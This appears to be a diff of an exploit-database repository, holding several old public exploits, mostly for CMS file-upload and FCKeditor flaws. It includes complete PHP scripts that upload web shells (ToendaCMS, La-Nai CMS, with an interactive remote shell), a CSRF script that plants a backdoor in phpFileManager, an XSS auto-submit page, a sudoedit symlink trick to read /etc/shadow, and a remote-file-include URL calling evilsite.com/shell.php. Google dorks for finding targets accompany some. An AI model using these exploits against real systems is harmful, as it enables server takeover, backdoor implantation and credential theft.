- Solution: In "config.asp", wherever you have: ConfigAllowedExtensions.Add "File","EXTENSION HERE" Change it to: ConfigAllowedExtensions.Add "File","^(Extensions HERE)$"
- Vulnerability: Vulnerable File: commands.asp Function: FileUpload() Vulnerable Code: sFileName = RemoveExtension( sOriginalFileName ) & "(" & iCounter & ")." & sExtension
- PoC:http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
"
Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:

36
platforms/linux/local/37710.txt Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation
# Date: 07-23-2015
# Exploit Author: Daniel Svartman
# Version: Sudo <=1.8.14
# Tested on: RHEL 5/6/7 and Ubuntu (all versions)
# CVE: CVE-2015-5602.
Hello,
I found a security bug in sudo (checked in the latest versions of sudo
running on RHEL and ubuntu) when a user is granted with root access to
modify a particular file that could be located in a subset of directories.
It seems that sudoedit does not check the full path if a wildcard is used
twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
file.txt real file with a symbolic link to a different location (e.g.
/etc/shadow).
I was able to perform such redirect and retrieve the data from the
/etc/shadow file.
In order for you to replicate this, you should configure the following line
in your /etc/sudoers file:
<user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
Then, logged as that user, create a subdirectory within its home folder
(e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
inside the new folder named test.txt pointing to /etc/shadow.
When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
be allowed to access the /etc/shadow even if have not been granted with
such access in the sudoers file.
I checked this against fixed directories and files (not using a wildcard)
and it does work with symbolic links created under the /home folder.

View file

@ -1,139 +1,139 @@
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
//works regardless of any php.ini settings,
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to toendacms\n";
echo "cmd: a shell command\n";
echo "Options:\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /cms/ ls -la\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
for ($i=0; $i<=count($allowed_extensions)-1; $i++){
$filename="suntzu.php.".$allowed_extensions[$i];
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="$shell\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
//echo $html;
$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi("Hi Master!",$html)){
$temp=explode("*delim*",$html);
die($temp[1]);}
}
//if you are here...
echo "Exploit failed...";
?>
# milw0rm.com [2006-07-18]
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
//works regardless of any php.ini settings,
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to toendacms\n";
echo "cmd: a shell command\n";
echo "Options:\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /cms/ ls -la\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
for ($i=0; $i<=count($allowed_extensions)-1; $i++){
$filename="suntzu.php.".$allowed_extensions[$i];
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="$shell\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
//echo $html;
$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi("Hi Master!",$html)){
$temp=explode("*delim*",$html);
die($temp[1]);}
}
//if you are here...
echo "Exploit failed...";
?>
# milw0rm.com [2006-07-18]

View file

@ -1,26 +1,26 @@
+-------------------------------------------------------------------------------------------
+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: MODx CMS 0.9.2.1
+ Vendor ............: http://modxcms.com/
+ Download ..........: http://modxcms.com/downloads.html
+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
+ Dork ..............: "powered by MODx"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
+ the $base_path variable before using it to include files, assuming register_globals = on,
+ we can intialize the variable in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
+
+ Proof Of Concept:
+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------
# milw0rm.com [2006-11-03]
+-------------------------------------------------------------------------------------------
+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: MODx CMS 0.9.2.1
+ Vendor ............: http://modxcms.com/
+ Download ..........: http://modxcms.com/downloads.html
+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
+ Dork ..............: "powered by MODx"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
+ the $base_path variable before using it to include files, assuming register_globals = on,
+ we can intialize the variable in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
+
+ Proof Of Concept:
+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------
# milw0rm.com [2006-11-03]

View file

@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow
FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.
html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>

125
platforms/php/webapps/37712.txt Executable file
View file

@ -0,0 +1,125 @@
# Exploit Title: CSRF Remote Backdoor Shell
# Google Dork: intitle: CSRF Remote Backdoor Shell
# Date: 2015-07-29
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: phpfm.sourceforge.net
# Software Link: phpfm.sourceforge.net
# Version: 0.9.8
# Tested on: windows 7 SP1
# Category: Webapps
Vendor:
================================
phpfm.sourceforge.net
Product:
============================
phpFileManager version 0.9.8
Vulnerability Type:
==========================
CSRF Remote Backdoor Shell
CVE Reference:
==============
N/A
Advisory Information:
========================================
CSRF Remote Backdoor Shell Vulnerability
Vulnerability Details:
=======================================================================
PHP File Manager is vulnerable to creation of arbitrary files on server
via CSRF which we can use to create remote backdoor shell access if victim
clicks our malicious linx or visits our malicious webpages.
To create backdoor shell we will need to execute two POST requests
1- to create PHP backdoor shell 666.php
2- inject code and save to the backdoor we just created
e.g.
https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]
Exploit code(s):
===============
<script>
var
scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
blasphemer(scripto)
var
maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='<?php+echo+'backdoor
shell by hyp3rlinx......';+exec($_GET['cmd']);+?>"
blasphemer(maliciouso)
function blasphemer(payload){
var xhr=new XMLHttpRequest()
xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
xhr.send(payload)
}
</script>
Disclosure Timeline:
=========================================================
Vendor Notification: July 28, 2015
July 29, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] phpFileManager 0.9.8
Vulnerable Parameter(s): [+] action, cmd_arg, file_data, chmod_arg,
save_file
Affected Area(s): [+] Web Server
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

27
platforms/php/webapps/37715.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability
# Google Dork: N/A
# Date: 28/7/2015
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://tendoo.org/
# Software Link: http://sourceforge.net/projects/tendoo-cms/
# Version: 1.3
# Tested on: Kali , Windows
# CVE : N/A
# Contact : 0xclay@gmail.com
######################
Introduction :
a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS
Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... .
######################
Stored Xss In http://localhost/tendoo/index.php/account/update In First
Name and Last Name Inputs
Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile
When First Name And Last Name Loads
JavaScripts Code Will Be Excuted
POC :
https://i.leetfil.es/e992ad2d.jpg
Discovered By Arash Khazaei

View file

@ -1,155 +1,155 @@
<?php
/*
--------------------------------------------------------------
La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://sourceforge.net/projects/la-nai/
[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
104. }
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nlanai-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-14]
<?php
/*
--------------------------------------------------------------
La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://sourceforge.net/projects/la-nai/
[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
104. }
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nlanai-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-14]

View file

@ -1,144 +1,144 @@
<?php
/*
--------------------------------------------------------------
Syntax CMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code
author...: Stack
mail.....: Ev!L
descr:
if the web site change the name of path or path is /public/ you can delet /public/ in the exploit
in the line :
"POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
[-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
